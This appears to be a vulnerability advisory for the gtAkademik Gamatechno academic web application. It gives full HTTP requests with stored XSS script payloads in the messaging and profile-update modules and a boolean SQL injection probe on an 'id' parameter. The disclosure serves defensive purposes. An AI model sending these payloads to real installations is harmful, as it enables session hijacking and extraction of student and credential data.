gtAkademik Gamatechno: SQL Injection and Persistent XSS
We discovered that gtAkademik Gamatechno web application is susceptible to SQL Injection and Cross-site Scripting (XSS).
Stored/Persistent XSS
The web application allows an attacker to inject XSS script inside the database (stored), because there is no sanitation process. There are 2 modules affected by XSS: Message Module and Update Profile Module.
Persistent XSS in Message Module
This module is used for internal messaging inside the gtAkademik. We are able to send an XSS-crafted message to others for example, to administrator user.
POST /index.php?pModule=zsinppiZmQ==&amp;pSub=zsinppiZmQ==&amp;pAct=0dWjlpylpw== HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&amp;pSub=xNKho6almcWem9isk5uW&amp;pAct=18yZqg== Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX Content-Type: application/x-www-form-urlencoded Content-Length: 169 data[MessageSender]=XXXXXXXXXX&amp;data[MessageReceiver]=XXXXXXXXXX&amp;data[MessageTitle]=<script>&amp;data[MessageContent]=<script>alert("XSS");</script>act=doCompose&amp;compBtn=Kirim
Persistent XSS in User Profile Module (save the user profile)
This module is used to update user profiles. We are able to inject an XSS into it and save the data to the database. As a result, anyone who tries to view any profile are vulnerable to XSS attack.
POST /index.php?pModule=1taZpQ==&amp;pSub=0dWjmaCemQ==&amp;pAct=xsedpw== HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&amp;pSub=0dWjmaCemQ==&amp;pAct=xsedpw==&amp;sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM= Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX Content-Type: application/x-www-form-urlencoded Content-Length: 213 tanggal=02/08/1988&alamat_asal=XXXXXXXXXX&alamat=<script>alert("XSS");</script>&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan
SQL Injection
The web application is also susceptible to SQL injection vulnerability, because there is no sensitization process. This allows an attacker to extract contents from the database, uncovering a large amount of sensitive and important data, such as credentials.
The parameter ‘id’ is vulnerable to SQL Injection.
http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204' AND '1'='1
Impact
Malicious authenticated users can exploit this vulnerability to execute arbitrary script in the context of a logged in user’s session. Further attack, malicious authenticated users may use SQL injection vulnerability to execute arbitrary SQL queries, potentially viewing or modifying data on the backend database.
Solution
Currently, we are not aware if any updates or patch is available from the vendor.